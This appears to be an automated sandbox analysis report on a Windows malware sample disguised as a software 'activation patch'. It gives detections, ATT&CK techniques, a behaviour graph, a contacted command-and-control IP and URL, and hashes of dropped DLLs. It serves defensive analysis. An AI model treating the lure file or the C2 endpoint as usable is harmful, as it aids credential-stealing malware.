                      Source: Yara matchFile source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Native API                      		Path Interception1
                      Exploitation for Privilege Escalation                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium11
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      System Shutdown/Reboot
                      Default Accounts12
                      Command and Scripting Interpreter                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		11
                      Deobfuscate/Decode Files or Information                      		1
                      Credential API Hooking                      		1
                      Account Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		Exfiltration Over Bluetooth1
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)12
                      Process Injection                      		2
                      Obfuscated Files or Information                      		Security Account Manager2
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Credential API Hooking                      		Automated Exfiltration2
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                      Software Packing                      		NTDS237
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer112
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Masquerading                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common241
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials421
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Access Token Manipulation                      		DCSync11
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job12
                      Process Injection                      		Proc Filesystem241
                      Virtualization/Sandbox Evasion                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing3
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 679264 Sample: KbqArOlW06.exe Startdate: 05/08/2022 Architecture: WINDOWS Score: 60 40 Snort IDS alert for network traffic 2->40 42 Multi AV Scanner detection for domain / URL 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 5 other signatures 2->46 7 KbqArOlW06.exe 4 2->7         started        process3 file4 22 A1Photo-&-Art-Enha...atch_Activation.exe, PE32 7->22 dropped 24 C:\Users\user\AppData\...\2.0.0-beta2.cps.exe, PE32 7->24 dropped 26 C:\Users\user\AppData\...\KbqArOlW06.exe.log, ASCII 7->26 dropped 10 2.0.0-beta2.cps.exe 20 7->10         started        15 A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe 2 7->15         started        process5 dnsIp6 38 51.195.166.178, 49778, 80 OVHFR France 10->38 28 C:\Users\user\AppData\...\vcruntime140.dll, PE32 10->28 dropped 30 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 10->30 dropped 32 C:\Users\user\AppData\LocalLow\softokn3.dll, PE32 10->32 dropped 36 4 other files (none is malicious) 10->36 dropped 48 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 10->48 50 Query firmware table information (likely to detect VMs) 10->50 52 Tries to harvest and steal browser information (history, passwords, etc) 10->52 56 3 other signatures 10->56 34 A1Photo-&-Art-Enha...atch_Activation.tmp, PE32 15->34 dropped 54 Obfuscated command line found 15->54 17 A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp 3 10 15->17         started        file7 signatures8 process9 file10 20 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 17->20 dropped

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      KbqArOlW06.exe27%VirustotalBrowse
                      KbqArOlW06.exe29%MetadefenderBrowse
                      KbqArOlW06.exe69%ReversingLabsByteCode-MSIL.Backdoor.Crysan
                      KbqArOlW06.exe100%AviraHEUR/AGEN.1231971

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\LocalLow\freebl3.dll0%VirustotalBrowse
                      C:\Users\user\AppData\LocalLow\freebl3.dll0%MetadefenderBrowse
                      C:\Users\user\AppData\LocalLow\freebl3.dll0%ReversingLabs
                      C:\Users\user\AppData\LocalLow\mozglue.dll0%VirustotalBrowse
                      C:\Users\user\AppData\LocalLow\mozglue.dll0%MetadefenderBrowse
                      C:\Users\user\AppData\LocalLow\mozglue.dll0%ReversingLabs
                      C:\Users\user\AppData\LocalLow\msvcp140.dll0%VirustotalBrowse
                      C:\Users\user\AppData\LocalLow\msvcp140.dll0%MetadefenderBrowse
                      C:\Users\user\AppData\LocalLow\msvcp140.dll0%ReversingLabs
                      C:\Users\user\AppData\LocalLow\nss3.dll0%VirustotalBrowse
                      C:\Users\user\AppData\LocalLow\nss3.dll0%MetadefenderBrowse
                      C:\Users\user\AppData\LocalLow\nss3.dll0%ReversingLabs
                      C:\Users\user\AppData\LocalLow\softokn3.dll0%VirustotalBrowse
                      C:\Users\user\AppData\LocalLow\softokn3.dll0%MetadefenderBrowse
                      C:\Users\user\AppData\LocalLow\softokn3.dll0%ReversingLabs
                      C:\Users\user\AppData\LocalLow\sqlite3.dll0%MetadefenderBrowse
                      C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
                      C:\Users\user\AppData\LocalLow\vcruntime140.dll0%MetadefenderBrowse
                      C:\Users\user\AppData\LocalLow\vcruntime140.dll0%ReversingLabs

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.3.KbqArOlW06.exe.18de6818.7.unpack100%AviraTR/Patched.Ren.GenDownload File
                      21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                      21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                      21.2.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                      16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                      22.2.A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.400000.0.unpack100%AviraHEUR/AGEN.1248792Download File
                      16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.3.KbqArOlW06.exe.16726700.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.3.KbqArOlW06.exe.16636690.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.3.KbqArOlW06.exe.16866738.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.3.KbqArOlW06.exe.179e67e0.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.3.KbqArOlW06.exe.16ae6770.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.3.KbqArOlW06.exe.166866c8.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                      16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.3.KbqArOlW06.exe.16fe67a8.5.unpack100%AviraTR/Patched.Ren.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.innosetup.com/0%URL Reputationsafe
                      http://www.palkornel.hu/innosetup0%VirustotalBrowse
                      http://www.palkornel.hu/innosetup0%Avira URL Cloudsafe
                      http://www.remobjects.com/psU0%URL Reputationsafe
                      http://51.195.166.178/8%VirustotalBrowse
                      http://51.195.166.178/0%Avira URL Cloudsafe
                      http://www.palkornel.hu/innosetup%10%URL Reputationsafe
                      http://www.remobjects.com/ps0%URL Reputationsafe
                      https://mozilla.org00%URL Reputationsafe
                      http://51.195.166.178/b6425a6ca38e36b1a195f6f3019a4b0a0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://51.195.166.178/true
                      • 8%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://51.195.166.178/b6425a6ca38e36b1a195f6f3019a4b0atrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.innosetup.com/A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.mediachance.com/2A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        http://www.mozilla.com/en-US/blocklist/2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.drfalse
                          		high
                          http://www.palkornel.hu/innosetupA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.remobjects.com/psUA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmpfalse
                            		high
                            https://www.mediachance.com/A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              https://www.mediachance.com/.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmpfalse
                                  		high
                                  http://www.palkornel.hu/innosetup%1A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.remobjects.com/psA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.mediachance.com/&A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://mozilla.org0freebl3.dll.16.dr, mozglue.dll.16.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sqlite.org/copyright.html.2.0.0-beta2.cps.exe, 00000010.00000002.510333215.0000000061ED1000.00000008.00000001.01000000.0000000E.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      51.195.166.178
                                      		unknownFrance
                                      		16276OVHFRtrue

                                      General Information

                                      Joe Sandbox Version:35.0.0 Citrine
                                      Analysis ID:679264
                                      Start date and time: 05/08/202213:51:212022-08-05 13:51:21 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 10m 41s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:KbqArOlW06.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:24
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal60.troj.spyw.evad.winEXE@7/13@0/1
                                      EGA Information:
                                      • Successful, ratio: 66.7%
                                      HDC Information:
                                      • Successful, ratio: 99.6% (good quality ratio 98.1%)
                                      • Quality average: 87.1%
                                      • Quality standard deviation: 21.8%
                                      HCA Information:
                                      • Successful, ratio: 61%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Adjust boot time
                                      • Enable AMSI

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • TCP Packets have been reduced to 100
                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                      • Excluded domains from analysis (whitelisted): www.bing.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                      • Execution Graph export aborted for target 2.0.0-beta2.cps.exe, PID 2332 because there are no executed function
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      No context

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\LocalLow\Zdpo36n9Wt80

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                      Category:dropped
                                      Size (bytes):40960
                                      Entropy (8bit):0.792852251086831
                                      Encrypted:false
                                      SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                      MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                      SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                      SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                      SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\LocalLow\freebl3.dll

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):684984
                                      Entropy (8bit):6.857030838615762
                                      Encrypted:false
                                      SSDEEP:12288:0oUg2twzqWC4kBNv1pMByWk6TYnhCevOEH07OqHM65BaFBuY3NUNeCLIV/Rqnhab:0oUg2tJWC44WUuY3mMCLA/R+hw
                                      MD5:15B61E4A910C172B25FB7D8CCB92F754
                                      SHA1:5D9E319C7D47EB6D31AAED27707FE27A1665031C
                                      SHA-256:B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
                                      SHA-512:7C1C982A2B597B665F45024A42E343A0A07A6167F77EE428A203F23BE94B5F225E22A270D1A41B655F3173369F27991770722D765774627229B6B1BBE2A6DC3F
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:moderate, very likely benign file
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.9b.........."!.........6...........................................................@A........................4,..S....,..........x............T..........8$...&...............................0..................D............................text............................... ..`.rdata.......0......................@..@.data...<F...@.......&..............@....00cfg...............(..............@..@.rsrc...x............*..............@..@.reloc..8$.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\LocalLow\mozglue.dll

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):627128
                                      Entropy (8bit):6.792651884784197
                                      Encrypted:false
                                      SSDEEP:12288:dfsiG5KNZea77VUHQqROmbIDm0ICRfCtbtEE/2OH9E2ARlZYSd:df53NZea3V+QqROmum0nRKx79E2ARlrd
                                      MD5:F07D9977430E762B563EAADC2B94BBFA
                                      SHA1:DA0A05B2B8D269FB73558DFCF0ED5C167F6D3877
                                      SHA-256:4191FAF7E5EB105A0F4C5C6ED3E9E9C71014E8AA39BBEE313BC92D1411E9E862
                                      SHA-512:6AFD512E4099643BBA3FC7700DD72744156B78B7BDA10263BA1F8571D1E282133A433215A9222A7799F9824F244A2BC80C2816A62DE1497017A4B26D562B7EAF
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:moderate, very likely benign file
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........V......./....................................................@A............................cQ......,....p...............r..........4C...........................W......h0...............................................text............................... ..`.rdata.......0......................@..@.data........0......................@....00cfg.......P....... ..............@..@.tls.........`......."..............@....rsrc........p.......$..............@..@.reloc..4C.......D..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\LocalLow\msvcp140.dll

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):449280
                                      Entropy (8bit):6.670243582402913
                                      Encrypted:false
                                      SSDEEP:12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
                                      MD5:1FB93933FD087215A3C7B0800E6BB703
                                      SHA1:A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
                                      SHA-256:2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
                                      SHA-512:79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:moderate, very likely benign file
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\LocalLow\nss3.dll

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2042296
                                      Entropy (8bit):6.775178510549486
                                      Encrypted:false
                                      SSDEEP:49152:6dvFywfzFAF7fg39IwA49Kap9bGt+qoStYnOsbqbeQom7gN7BpDD5SkIN1g5D92+:pptximYfpx8OwNiVG09
                                      MD5:F67D08E8C02574CBC2F1122C53BFB976
                                      SHA1:6522992957E7E4D074947CAD63189F308A80FCF2
                                      SHA-256:C65B7AFB05EE2B2687E6280594019068C3D3829182DFE8604CE4ADF2116CC46E
                                      SHA-512:2E9D0A211D2B085514F181852FAE6E7CA6AED4D29F396348BEDB59C556E39621810A9A74671566A49E126EC73A60D0F781FA9085EB407DF1EEFD942C18853BE5
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:moderate, very likely benign file
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........&...............................................`............@A.........................!..\...T...@....@..x....................P..h...h...................................................\....!..@....................text...i........................... ..`.rdata..............................@..@.data....N.......*..................@....00cfg.......0......................@..@.rsrc...x....@......................@..@.reloc..h....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\LocalLow\softokn3.dll

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):254392
                                      Entropy (8bit):6.686038834818694
                                      Encrypted:false
                                      SSDEEP:6144:uI7A8DMhFE2PlKOcpHSvV6x/CHQyhvs277H0mhWGzTdtb2bbIFxW7zrM2ruyYz+h:uI7A8DMhFE2PlbcpSv0x/CJVUmhDzTvS
                                      MD5:63A1FE06BE877497C4C2017CA0303537
                                      SHA1:F4F9CBD7066AFB86877BB79C3D23EDDACA15F5A0
                                      SHA-256:44BE3153C15C2D18F49674A092C135D3482FB89B77A1B2063D01D02985555FE0
                                      SHA-512:0475EDC7DFBE8660E27D93B7B8B5162043F1F8052AB28C87E23A6DAF9A5CB93D0D7888B6E57504B1F2359B34C487D9F02D85A34A7F17C04188318BB8E89126BF
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
